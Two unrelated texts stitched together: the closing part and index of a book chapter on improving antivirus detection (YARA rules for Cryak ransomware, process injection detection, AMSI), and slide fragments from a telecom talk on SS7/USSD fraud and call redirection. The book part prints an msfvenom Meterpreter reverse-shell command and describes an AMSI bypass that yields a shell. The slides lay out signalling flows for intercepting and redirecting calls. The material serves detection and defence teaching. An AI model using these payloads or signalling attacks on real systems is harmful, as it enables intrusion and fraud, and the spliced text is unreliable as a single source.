that is passed as the yara parameter from the main() function within the for loop, and the len parameter, which is used to calculate the number of bytes to read. Now let's explore the important functions in this code, which are most relevant specifically to this PoC. First, the OpenProcess() Windows API function is used to receive a handle to the current scanned process by its PID. Improving antivirus detection 197 Next, the VirtualQueryEx() Windows API function retrieves the virtual memory address space ranges to scan for the current scanned process. For each queried memory address range, we read the content of the memory using the ReadProcessMemory() Windows API function to then compare using the memcmp() function and check whether our malicious string or pattern exists in the memory address range of the currently scanned process. This process repeats until it finishes scanning all processes retrieved in the initial snapshot. We believe that this strategy can add a lot of value to antivirus detection engines because YARA signatures are so easy to use and maintain, both by the antivirus vendor and by the infosec community. The PoC we have included here just demonstrates the tip of the iceberg. There is much work still to be done in our field through the efforts of professional security researchers and software developers contributing their expertise for the benefit of the community. The detection of process injection As discussed in Chapter 4, Bypassing the Dynamic Engine, malware often uses process injection techniques to hide its presence in an attempt to evade antivirus software. The most important point at which to detect process injection is when the malware starts to load in the system and before the injected code is executed. Here is a list of possible detection mechanisms that can be used to detect process injection-based attacks. Static-based detection Having discussed YARA as a great added-value tool to detect malicious software statically and dynamically at the memory level, let's now see how we can detect process injection by Windows API calls and even relevant opcodes. We will base our example and detailed explanation on ransomware dubbed Cryak that actually facilitates the process injection technique of process hollowing to further infect victim machines. 198 Best Practices and Recommendations First and foremost, we can seek common Windows API function calls that are commonly used to conduct process injection, Windows API functions such as OpenProcess, VirtualAlloc, WriteProcessMemory, and more. In this case, the Cryak ransomware facilitates the process injection technique of process hollowing using the following Windows API functions: • CreateProcessA with the parameter of dwCreationFlags, which equals 4 (CREATE_SUSPENDED): Figure 8.6 – Process hollowing – Create Process within a suspended state • ReadProcessMemory to check whether the destined injected memory region is already injected and NtUnmapViewOfSection to hollow a section in the suspended created process: Improving antivirus detection 199 Figure 8.7 – Process hollowing – the use of NtUnmapOfSection • VirtualAllocEx to allocate a new region of memory: Figure 8.8 – Process hollowing – the use of VirtualAllocEx 200 Best Practices and Recommendations • WriteProcessMemory to inject the malicious code into the allocated memory in the suspended process: Figure 8.9 – Process hollowing – the use of WriteProcessMemory • SetThreadContext and ResumeThread to resume execution of the thread in the created process, thus making the injected code execute in the created process: Figure 8.10 – Process hollowing – the use of SetThreadContext and ResumeThread At this stage of execution, the injected malicious content is executed in the newly spawned process, as previously explained in the book. Improving antivirus detection 201 To detect this and other process injection techniques using YARA signatures, we can use the names of used Windows API calls with some assembly opcodes. Following is an example of the YARA signature that we have created in order to detect the Cryak ransomware sample: private rule PE_Delphi {     meta:         description = "Delphi Compiled File Format"     strings:         $mz_header = "MZP"     condition:         $mz_header at 0 } rule Cryak_Strings {     meta:         description = "Cryak Ransomware"         hash = "eae72d803bf67df22526f50fc7ab84d838efb2865c27ae f1a61592b1c520d144"         classification = "Ransomware"         wrote_by = "Uriel Kosayev – The Art of Antivirus Bypass"         date = "14.01.2021"     strings:         $a1 = "Successfully encrypted" nocase         $a2 = "Encryption in process" nocase         $a3 = "Encrypt (compatible with  decryptor)"         //$ransom_note = ""     condition:        filesize < 600KB and PE_Delphi and 1 of ($a*) 202 Best Practices and Recommendations } rule Cryak_Code_Injection {     meta:         description = "Cryak Ransomware Process Injection"         hash = "eae72d803bf67df22526f50fc7ab84d838efb2865c27ae f1a61592b1c520d144"         classification = "Ransomware"         wrote_by = "Uriel Kosayev"         date = "14.01.2021"     strings:         $inject1 = {6A 00 6A 00 6A 04 6A 00 6A 00 6A 00 8B 45  F8 E8 C9 9B FA FF 50 6A 00 E8 ED B8 FA FF 85 C0 0F 84 A9 02 00  00}   // CreateProcess in a Suspended State (Flag 4)         $inject2 = {50 8B 45 C4 50 E8 29 FD FF FF 85 C0 75 1D}    // NtUnmapViewOfSection         $winapi1 = "OpenProcess"         $winapi2 = "VirtualAlloc"         $winapi3 = "WriteProcessMemory"         $hollow1 = "NtUnmapViewOfSection"         $hollow2 = "ZwUnmapViewOfSection"     condition:     Cryak_Strings and 1 of ($hollow*) and all of ($winapi*) and  all of ($inject*) } Let's now explain the different parts of this signature, which includes one private rule and two other regular rules. Improving antivirus detection 203 The private rule PE_Delphi is a simple rule to detect Delphi-compiled executables based on the "MZP" ASCII strings (or 0x4D5A50 in hex) as can be seen in the following screenshot: Figure 8.11 – An executable file compiled with Delphi with the "MZP" header Next, the YARA rule of Cryak_Strings, as the name suggests, will look for hardcoded strings in the ransomware sample. You will also notice that we have used the condition of filesize < 600KB to instruct YARA to scan only files that are less than 600 KB and also, to scan files that have only the "MZP" ASCII strings in the offset of 0 (which is achieved by using the private rule of PE_Delphi). Finally, we have the Cryak_Code_Injection rule that first scans for the strings based on the first rule of Cryak_Strings, then YARA scans for the relevant Windows API function used in order to conduct process injection, and also some opcodes that are extracted from the ransomware sample using IDA Pro. To extract opcodes or any other hex values from IDA, you first need to highlight the relevant extracted code as in the following screenshot: Figure 8.12 – Subroutine code to be extracted in an opcode/hex representation 204 Best Practices and Recommendations Then, press the Shift + E keys to extract the opcodes/hex values: Figure 8.13 – The extracted opcode/hex representation of the subroutine And finally, you can take the opcodes and implement them as part of the YARA signature using the following syntax: $variable_name = {Hex values} You can integrate the hex code in regular or spaced format. Let's now go and understand the concept of flow-based detection. Improving antivirus detection 205 Flow-based detection As discussed in previous chapters, process injection involves executing four general steps: 1. Receive a handle to the targeted process 2. Allocate memory in the targeted process memory space 3. Inject (write) the malicious payload into the allocated memory space 4. Execute the injected malicious payload in the targeted process By understanding the preceding applied flow, antivirus detection engines can dynamically and heuristically intercept suspicious function calls (not only based on Windows API functions), identifying parameters used in each function, and checking their order or flow of execution. For example, if a malicious injector process initiates a process injection technique such as process hollowing, an antivirus engine can detect it based on the flow of used Windows API functions (refer to our process injection poster in Chapter 4, Bypassing the Dynamic Engine), the use of specific parameters such as the creation flag of "CREATE_ SUSPENDED" in the CreateProcess function, then the use of an unmapping mechanism such as ZwUnmapViewOfSection or NtUnmapViewOfSection, the allocation of memory using VirtualAllocEx, WriteProcessMemory, and finally, the use of the ResumeThread function. Log-based detection The detection of process injection can be also be done based on log or system events such as Windows event logs. By implementing capabilities such as Sysmon (System Monitor) in the Windows operating system, antivirus engines can achieve more detections of process injection attempts. For those not already familiar with Sysmon, it is a Windows system service and device driver that extends the log collection capability far beyond Windows' default event logging. It is widely used for detection purposes by Security Operations Center (SOC) systems and by incident responders. Sysmon provides event logging capabilities for events such as process creation, the execution of PowerShell commands, executed process injection, and more. Each event has a unique event ID that can also be collected by various security agents and SIEM collectors. Specifically, with process injection, many event IDs can be used and cross-referenced to achieve the detection of process injection. 206 Best Practices and Recommendations For instance, event ID 8 can be used to detect process injection by flagging any incident in which a process creates a thread in another process. However, further research needs to be conducted in this area to achieve the most holistic detection based on logs. Registry-based detection Malware tends to not only inject its code (shellcode, exe, dll, and so on) but also to persist in the system. One of the common ways to accomplish this is through the use of registry keys. Malware can incubate or persist in the system using the following registry keys, for example: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\ Appinit_Dlls HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\ Windows\Appinit_Dlls These registry keys can be used both as persistent and injection mechanisms. The fact that malware can potentially manipulate registry keys by adding a malicious DLL provides it with persistency within the system. In addition, it can also be used as an injection mechanism because the malicious DLL that is loaded using the previously-mentioned registry keys is in fact injected or loaded into any process in the system that loads the standard User32.dll. Just imagine the impact and the power of such an injection and persistence ability. We recommend that antivirus vendors implement in their detection engines the capability of detecting malware that executes registry manipulation operations using functions such as RegCreateKey and RegSetValue. Behavior-based detection As the name suggests, behavior-based detection can be very useful to detect anomalous or suspicious activities. Examples of anomalous behavior might include the following: • A process such as Notepad.exe or Explorer.exe executing strange command- line arguments or initiating network connections to an external destination • Processes such as svchost.exe or rundll32.exe running without command-line arguments • Unexpected processes such as PowerShell.exe, cmd.exe, cscript.exe, or wmic.exe Improving antivirus detection 207 File-based detection Antivirus vendors can implement a minifilter driver in order to achieve file-based detection. We recommend scanning files before execution, at load time. Scan for suspicious indicators and alteration operations before execution begins. For instance, an antivirus engine can detect the creation of sections in targeted files. To summarize, detecting process injection is not an easy task, especially not for antivirus vendors. It is crucial to use as many detection capabilities as possible and even correlate their results in order to achieve the best possible detection with fewer false positives. Let's now discuss and understand script-based malware detection with AMSI. Script-based malware detection with AMSI In this section, we will go through the use of AMSI in different antivirus software to detect script-based malware that utilizes PowerShell, VBA Macros, and more. AMSI – Antimalware Scan Interface AMSI is a feature or interface that provides additional antimalware capabilities. Antivirus engines can use this interface to scan potentially malicious script files and fileless malware scripts that run at the runtime memory level. AMSI is integrated into various Windows components, such as the following: • Windows User Account Control (UAC) • PowerShell • wscript.exe and cscript.exe • JavaScript and VBScript • Office VBA macros By using Microsoft's AMSI, it is possible to detect potential malicious events such as the execution of malicious VBScript, PowerShell, VBA macros, and others. 208 Best Practices and Recommendations Here is an overview of Microsoft's AMSI internals: Figure 8.14 – AMSI internals architecture As seen here, several functions are exposed for use by third-party applications. For example, antivirus engines can call functions such as AmsiScanBuffer() and AmsiScanString() to scan for malicious content in each file and fileless script-based malware before execution takes place. If AMSI detects that the script is malicious using these functions, it will halt execution. AMSI – malware detection example To better understand AMSI, the following example will demonstrate its capability of detecting script-based malware. Here, we used a simple, non-obfuscated meterpreter shell generated in a PowerShell format with the following msfvenom command: msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 --arch x64 --platform win -f psh -o msf_payload.ps1 After we executed the script and Windows Defender, AMSI caught our simple PowerShell payload. Here is a screenshot of AMSI detecting the msfvenom based malware: Improving antivirus detection 209 Figure 8.15 – AMSI detects the PowerShell-based MSF payload As seen here, PowerShell threw an exception alerting us that the file contained malicious content. We can also monitor for these types of events in Windows event logs, using the %SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx event log file, which contains several event IDs such as 1116 (MALWAREPROTECTION_STATE_MALWARE_DETECTED) and 1117 (MALWAREPROTECTION_STATE_MALWARE_ACTION_TAKEN), which are triggered by an attempt to execute this type of payload. The following screenshot demonstrates the event log entry for our PowerShell payload based on event ID 1116: Figure 8.16 – AMSI detection log based on Event ID 1116 210 Best Practices and Recommendations And here is the entry based on event ID 1117: Figure 8.17 – AMSI detection log based on Event ID 1117 Now that we understand the concept and usage of AMSI, let's see how to bypass it. AMSI bypass example We often like to say, "To bypass security is to strengthen security." Of course, this also applies to AMSI bypassing. The following example uses the same PowerShell script that we tried to execute in the previous example, but with a slight difference. Based on an awesome project called AMSI. fail (https://github.com/Flangvik/AMSI.fail), we copied the generated code from the website, which we can of course also obfuscate to harden the detection, and pasted it into the PowerShell console to demonstrate an in-memory-like execution: Figure 8.18 – The bypass payload used from AMSI.fail Secure coding recommendations 211 Next, we executed the previous reverse-shell payload and got a full meterpreter shell: Figure 8.19 – The gained shell after the bypass has been executed On the left side, you can see the meterpreter shell, and on the right side, you can see the msf payload run on PowerShell. We recommend that antivirus vendors implement this capability, investing extensive time and consideration in it if possible. Relying solely on AMSI is obviously not a good practice, but as an additional capability in our arsenal, it can add tremendous value to antivirus engines. Malware-based attacks are always evolving and emerging, especially the first stages of malware attacks that are delivered and executed through the use of scripts, whether through the command line, PowerShell, VBA macros, VBScript, HTA files, or other interesting and out-of-the-box methods. Let's now go through some secure code tips and recommendations. Secure coding recommendations Because antivirus software is a product that is by definition providing some level of security to endpoints, writing secure code is essential. We can learn from history that there are plenty of security vulnerabilities out there that can be used by malicious threat actors in the wild, which is why antivirus software vendors must put in their best effort to make their antivirus software more secure, plan their code securely, implement best practices, and always follow industry guidelines and recommendations. Here are our secure code development recommendations to help improve your overall antivirus software security. 212 Best Practices and Recommendations Self-protection mechanism The most basic recommendation for any antivirus software vendor is to ensure that you have applied a self-protection mechanism to your own product. Most antivirus software applies some level of self-protection to make it difficult for security researchers or threat actors to exploit vulnerabilities in the antivirus software itself. If your antivirus software does not, this recommendation is an absolute must at the earliest possible opportunity. Plan your code securely To avoid the need for future software updates and patching to your antivirus software to the greatest extent possible, it is crucial to plan your antivirus software with an emphasis on secure coding, by following best practices and methodological procedures. This involves mapping all possible vulnerabilities that could be exploited in your product, as well as mapping all possible secure code solutions for those vulnerabilities. This ensures that your product will not be susceptible to potential future exploits. It is very important to work methodically, using predefined procedures that can be modified if needed. Do not use old code With time, antivirus vendors need to advance with their antivirus products, thus advancing with their code. It is very important to regularly update the code and also delete old code. The odds of exploiting a vulnerability or even chaining several of them because of old code implementations are high. You can always archive the code in some other secure place if you have a good reason for this. Input validation As we have seen earlier in this section, it is essential to apply input validation at any point in your code that expects input from the user or any other third parties such as API calls (not necessarily Windows API calls), loaded DLL, network packets received, and more. By doing this, we can prevent the possibility of malicious input from users, third parties, or even fuzzers, which could lead to denial of service or remote code execution attacks, which could ultimately be used to bypass the antivirus software. Secure coding recommendations 213 PoLP (Principle of Least Privilege) As we have discussed in previous chapters of this book, antivirus software vendors should manage the privileges of each antivirus component so it cannot be misused or exploited by the user or any other third-party actor. Be sure to use proper permissions for each file (exe, dll, and so on), process, and any other principle or entity that can inherit permissions, without providing more permissions than are needed. This can, in turn, prevent low-privileged users from excluding a file or process that is actually malicious. Compiler warnings This simple yet very effective trick will ensure that the compiler warns you when using potentially vulnerable functions such as strcat(), strcpy(), and so on. Be sure to configure the highest level of warnings. Simply put, the more time you invest at the beginning of the software development life cycle (SDLC), the less time you will need to invest in patching your code afterward. Automated code testing Implement automation mechanisms to test and validate your code against potentially vulnerable functions, imports, and other frameworks. Two approaches to achieving more secure and reliable code involve static testing, in which we test our code without executing and debugging it, and dynamic testing, which involves executing and debugging the code's functionality. We recommend a hybrid approach drawing on aspects of both. Wait mechanisms – preventing race conditions To avoid race condition vulnerabilities in your antivirus software, which can lead to invalid and unpredictable execution and in some cases, permit feasible antivirus bypass, use a "wait mechanism". This will ensure that the program waits for one asynchronous operation to end its execution so that the second asynchronous operation can continue. Integrity validation When antivirus software downloads its static signature file (to update its static signature database), be sure to apply some type of integrity validation mechanism on the downloaded file. For instance, you can calculate the designated hash of the downloaded file. This mechanism prevents situations where a security researcher or threat actor might perform manipulations on the file, swapping the static signature with another file to bypass the static antivirus detection engine. In this section, we learned about ways of protecting our code against potential abuse. 214 Best Practices and Recommendations Summary To summarize this chapter of the book, antivirus bypasses will always be relevant for a variety of reasons, such as the following: • Code that is not written securely • A component that does not work properly. In this chapter, you have gained knowledge and understanding of the importance of securing antivirus software from vulnerability and detection-based bypassed. In order to protect antivirus engines from bypasses, it is first necessary to perform and test bypass attempts, in order to know exactly where the security vulnerability is located. Once the security vulnerability is found, a fix must be implemented so attackers cannot exploit the vulnerability. Of course, antivirus code must be regularly maintained, because from time to time more vulnerabilities can arise and be found. These recommendations are based on our research and extensive tests conducted over a number of years that are also based on major antivirus software vulnerabilities that have been publicly disclosed in the last 10 years. We want to thank you for your time and patience reading this book and gaining the knowledge within. We hope that knowledge will be used for the purpose of making the world a more secure place to live in. We are here to say that antivirus is not a 100% bulletproof solution. Packt.com Subscribe to our online digital library for full access to over 7,000 books and videos, as well as industry leading tools to help you plan your personal development and advance your career. For more information, please visit our website. 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Index A Address Space Layout Randomization (ASLR) 42, 191 Advanced Persistent Threat (APT) 77 American National Standards Institute (ANSI) 67 Android Package Kit (APK) file 98 Antimalware Scan Interface (AMSI) about 207 bypass example 210, 211 malware detection example 208, 209 script-based malware detection 207 AntiScan.Me reference link 62 antivirus basics 8-11 antivirus bypass binary patching, using 144, 154, 156, 157 in nutshell 11, 12 junk code, using 159, 160 PowerShell, using 161, 164, 166, 167 preparation 56 research, tips 57 using, dynamic-link library (DLL) 81, 83, 84 using, process-injection 63 using, timing-based techniques 85 Windows API calls 86, 88, 89 with encryption 117 with obfuscation techniques 98 with packers 121 antivirus bypass dedicated vulnerabilities avoiding 189 DLL hijacking vulnerability, avoiding 189 Unquoted Service Path vulnerability, avoiding 190, 191 antivirus detection, improving about 192 detection, of process injection 197 dynamic YARA 192 script-based malware detection, with AMSI 207 antivirus research about 16 approaches 40 lead, defining 20 lead, gathering 16 process 17 registry 18, 19 thread 18 220 Index work environment 16 antivirus software about 7, 180 bypassing, in red team operation 179 fingerprinting 180-185 third-party engines 36 antivirus software, permission problems about 47 improper privileges 47 static signature file, insufficient permissions 47 application programming interface (API) 60, 115 ASPack 134 assembly language 144 Autoruns reference link 32 working with 32, 33 B binary patching using, for antivirus bypass 144, 154, 156, 157 buffer overflow about 50 antivirus bypass approach 51 stack-based buffer overflow 51 types 50 buffer overflow, approaches automated approach 50 manual approach 50 buffer overflow vulnerabilities, avoiding about 191 Address Space Layout Randomization (ASLR) 191 Data Execution Prevention (DEP) 191 fuzzing 192 memory boundary validation 191 reverse engineering 192 stack canaries 191 bypassed antivirus engines 172 C calloc() about 91, 92 versus malloc() 91, 92 central processing unit (CPU) 83, 137 classic DLL injection 71 command-and-control (C2/C&C) 10, 113 control-flow obfuscation 104, 105 CreateFile execution flow 67-70 cybercriminals goals 4 D DAST (Dynamic Application Security Testing) 192 Data Execution Prevention (DEP) 42, 191 Data Leak Prevention (DLP) 5 debugging technique 145 Detect it Easy (DiE) 122 disassembler 145 Discretionary Access Control List (DACL) 45 Disk Operating System (DOS) 82, 107 DLL hijacking about 49 vulnerability, avoiding 189 domain generation algorithm (DGA) 60 Domain Name System (DNS) 60 dynamic engine 9 Index 221 dynamic-link library (DLL) 121 used, for bypassing antivirus 81, 83, 84 dynamic YARA about 192 benefits 192 malicious strings, hunting 193-197 E encryption using, in antivirus bypass 117 encryption, sub-techniques metamorphic code 120 oligomorphic code 118 polymorphic code 118, 119 Endpoint Detection and Response (EDR) 5, 140 Entropy 122 entry point (EP) 124 executable (EXE) file 107 Executable Linkable Format (ELF) 81 Extended Instruction Pointer (EIP) 51, 133 F fuzz testing 50 G general-purpose registers (GPRs) 147 Graphical User Interface (GUI) 43 H heuristic engine 10 hexadecimal (hex) 106 HyperText Transfer Protocol (HTTP) 60 I Import Address Table (IAT) 133 Internet Protocol (IP) 58, 109 Intrusion Detection Systems (IDS) 5 Intrusion Prevention Systems (IPS) 5 J Jotti’s malware scan detections 62 reference link 61 junk code about 159 using, for antivirus bypass 159, 160 K Knowledge Base (KB) 57 L last in, first out (LIFO) 146 Local Area Network (LAN) 179 M Mach Object (Mach-O) 81 malicious software 5 malicious strings hunting 193-197 malloc() about 90 versus calloc() 91, 92 malware about 5 defining 5 malware, types 222 Index about 6, 7 Backdoor 6 Botnet 6 Downloader 6 Dropper 6 potentially unwanted program (PUP) 6 Ransomware 6 Rootkit 6 Scareware 6 Spyware 6 Trojan 6 Virus 6 Worm 6 memory bombing about 90-95 calloc() 91, 92 malloc() 90 metamorphic code 120 multiple antivirus bypass techniques combining 168, 169 executable before and after peCloak example 169-171 N Native API versus Windows API 66, 67 Network Access Control (NAC) 5 Network Address Translation (NAT) 12 no operation (NOP) 120 O obfuscation techniques about 98 control-flow obfuscation 104, 105 rename obfuscation 99, 101, 103 using, in antivirus bypass 98 oligomorphic code 118 operation code (opcode) 106 original entry point (OEP) 121 P packers about 121 false positives 140, 141 using, in antivirus bypass 121 working 121 packers, unpacking process about 121 ASPack, manually unpacking 134-139 UPX 122-127 UPX files, manually unpacking 127, 129, 130-134 packet capture (PCAP) 60 peCloak example antivirus software, limitations 171 PE file about 81 format structure 82 PE headers 82 penetration test (pentest) 178 PE sections 83 polymorphic code 118, 119 potentially unwanted program (PUP) 6 PowerShell using, for antivirus bypass 161, 163, 164, 166, 167 process address space 64 process doppelgänging 75-77 Process Explorer tool reference link 20 working with 20-26 process hollowing 72-74 process identifier (PID) 194 Index 223 process-injection classic DLL injection 71 implementation 65 used by, threat actors 77, 78, 80 used, for bypassing antivirus 63 process injection, detection about 197 behavior-based detection 206 file-based detection 207 flow-based detection 205 log-based detection 205, 206 registry-based detection 206 static-based detection 197-204 Process Monitor reference link 26 working with 26, 28, 29, 30, 31 Process Monitor (ProcMon) 67 proof of concept (POC) 89, 116, 178, 193 protection rings about 42 in Windows operating system 43-45 protection systems DLP 7 EDR 7 exploring 7 Firewall 7 IDS/IPS 7 R red team operation about 178 antivirus software, bypassing 179, 180 Regshot about 33 reference link 20 working with 33-36 rename obfuscation 99, 101, 103 Return-Oriented Programming (ROP) 51, 191 reverse engineering about 144, 145 Assembly x86 code examples 149-153 Assembly x86 commonly used instructions 148, 149 Assembly x86 most commonly used instructions 149 assembly x86 registers 147 heap 146 indexes and pointers 147 stack 146 S sandbox 9 SAST (Static Application Security Testing) 192 script-based malware detection with AMSI 207 secure coding recommendations about 211 automated code testing 213 code, planning securely 212 compiler warnings 213 input validation 212 integrity validation 213 old code, avoiding 212 PoLP (Principle of Least Privilege) 213 self-protection mechanism 212 wait mechanisms 213 security landscape 4, 5 Security Operations Center (SOC) 205 Server Message Block (SMB) 179 software development life cycle (SDLC) 213 stack 146 224 Index stack-based buffer overflow 51 static engine 8 Structured Exception Handling Overwrite Protection (SEHOP) 42 Sysinternals suite reference link 20 Sysmon (System Monitor) 205 T threat actors process-injection, used by 77-80 timestomping 157, 158 Transmission Control Protocol (TCP) 60, 109 Turbo Assembler (TASM) download link 152 U Uniform Resource Locator (URL) 58 Universal Serial Bus (USB) 178 unpacker engine 11 unpackers 11 Unquoted Service Path vulnerability about 48 avoiding 190, 191 reference link 48 User Account Control (UAC) 207 V VirScan reference link 61 VirusTotal about 58-60 URL 58 VirusTotal Jujubox 59 Visual Basic for Applications (VBA) 108 W Windows access control list 45, 46 Windows API about 66 calls, for antivirus bypass 86, 88, 89 CreateFile, execution flow 67-70 need for 66 versus Native API 66, 67 Windows Management Instrumentation (WMI) 182 Windows operating system about 40- 42 protection rings 43-45 Y Yet Another Recursive Acronym (YARA) about 105 building blocks 105, 107 bypassing 109 Emotet downloader 108, 109 Locky ransomware 107 potential malware, detecting 105 static engine bypass 109-116
Dmitry Kurbatov Sergey Puzankov Vladimir Kropotov Fractured Backbones – Incidents Detection and Forensics in Telco Networks ptsecurity.com About us Joint research of Incident Response and Telco Security Teams Introduction Technologies behind telco networks Чем мы пользуемся сегодня и на основе каких технологий это работает Types of Incidents • Subscriber location tracking • Call interception (wiretapping) • SMS interception and spoofing • DoS, including balance DoS • Other Fraudulent activities Phone number +7 777 5555555 GPS location Incidents statistics. Major threats Service Disruption Data Leakage Fraud Percentage of vulnerable networks Incidents statistics. Data leakage Subscriber’s Balance Disclosure Terminating SMS Interception Subscriber Location Discovery Voice Call Interception Subscriber’s Data Leakage Percentage of vulnerable networks Incidents statistics. Fraud Terminating Call Redirection Money Transfer via USSD Subscriber Profile Change Originating Call Redirection Percentage of vulnerable networks Incident victims • Mobile operator subscribers • Mobile operator • Other Mobile operators and their subscribers • Third parties (often Banks and Their clients) Prerequisites of attacks • Internal intruder or Staff initiated attacks • Level0 (almost) Kiddies - attacks that not require deep technical knowledge •SMS fraud as preliminary stage of malware based attacks •Fraud with social engineering (direct target is victim) •Proxified fraud with social engineering • Level1(Locally initiated) - attacks that require technical knowledge about Radio Access Network protocols •IMSI Catcher •Bluetooth •Calls and SMS from the subscriber located nearby •Level2 (Global impact) - attacks that require technical knowledge about telco infrastructure and protocols Lightweight scenarios (Level0) Kiddies fraud examples Typosquatting works well even here http://journal.tinkoff.ru/declined/ Not legit Legit You received 30000 RUB, please follow the link for confirmation Purchase. Card *1234. Ammount 600 RUB. Drugstore 2000… Available balance 82634.32 RUB Central bank not only in emails... Mature player and kiddies used the same brand name http://www.rbc.ru/finances/17/03/20 16/56e97c089a794797e5b8e6b3 /Cental Bank of Russian Federation/ Your banking cards accounts was suspended! Info: +79649910054 Social engineering telco staff • Temporary redirect calls and SMS to another number • Own victim email, social networks accounts, messengers and in some cases Money (Banking OTP TBD) • Fast WIN Cases (Level1) SMS interception Voice call interception • Originating call • Terminating call Voice call interception. MitM Level2 Cases (global impact) Telco infrastructure, technical view Telco infrastructure, technical view Telco infrastructure, technical view Telco infrastructure, technical view IMSI Disclosure Money fraud cases •Infect smartphone with malware. •Use fake base station (IMSI catcher) and to make software clone of SIM card. •Conduct an attack via SS7 network forging USSD request. USSD manipulation Request the balance *100#. Balance is 128.55 Roubles USSD manipulation *145*xxxxxx81142*10# - Transfer 10 Roubles to the number xxxxxx81142 USSD manipulation Cool security mechanism. Just send *145*851# to confirm the transaction USSD manipulation New balance is 118.55 Roubles. (10 Roubles ~ 0.15 €) Calls or SMS on behalf particular person located anywhere • SMS spoofing More sophisticated attacks Example Voice call redirection with a fraudulent activity Fraud case 1 Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 RegisterSS (IMSI, CFU, 5312345678) RegisterSS Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) RegisterSS (IMSI, CFU, 5312345678) RegisterSS Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) RegisterSS (IMSI, CFU, 5312345678) RegisterSS Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) RegisterSS (IMSI, CFU, 5312345678) RegisterSS Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) SendRoutingInfo (CFU, 5312345678) RegisterSS (IMSI, CFU, 5312345678) RegisterSS Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) SendRoutingInfo (CFU, 5312345678) RegisterSS (IMSI, CFU, 5312345678) RegisterSS InitialDP (B-Number, 5312345678) ApplyCharging, Continue Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) SendRoutingInfo (CFU, 5312345678) RegisterSS (IMSI, CFU, 5312345678) RegisterSS ApplyCharging, Continue IAM (A-Number, 5312345678) Number 88612345670 IMSI 466901234567891 InitialDP (B-Number, 5312345678) Zimbabwe Cuba Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) SendRoutingInfo (CFU, 5312345678) RegisterSS (IMSI, CFU, 5312345678) RegisterSS ApplyCharging, Continue IAM (A-Number, 5312345678) Who pays? Number 88612345670 IMSI 466901234567891 InitialDP (B-Number, 5312345678) Zimbabwe Cuba Who pays? Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) SendRoutingInfo (CFU, 5312345678) RegisterSS (IMSI, CFU, 5312345678) RegisterSS ApplyCharging, Continue IAM (A-Number, 5312345678) Number 88612345670 IMSI 466901234567891 InitialDP (B-Number, 5312345678) Zimbabwe Cuba Who pays? Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) SendRoutingInfo (CFU, 5312345678) RegisterSS (IMSI, CFU, 5312345678) RegisterSS ApplyCharging, Continue IAM (A-Number, 5312345678) Number 88612345670 IMSI 466901234567891 InitialDP (B-Number, 5312345678) Zimbabwe Cuba Voice call redirection with a fraudulent activity Fraud case 2 Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) ProvideSubscriberInfo (IMSI) Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) ProvideSubscriberInfo (IMSI) ProvideSubscriberInfo (Location = Home) Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) ProvideSubscriberInfo (IMSI) ProvideSubscriberInfo (Location = Home) SendRoutingInfo (Location = Home) Number 88612345670 IMSI 466901234567891 Zimbabwe Voice call redirection with a fraudulent activity Billing GMSC HLR 26121456789 IAM (A-Number, B-Number) SendRoutingInfo (MSISDN) UpdateLocation (IMSI, Fake MSC/VLR) InsertSubscriberData (Profile) ProvideSubscriberInfo (IMSI) ProvideSubscriberInfo (Location = Home) SendRoutingInfo (Location = Home) InitialDP (A-Num, B-Num, Location) ApplyCharging, Continue 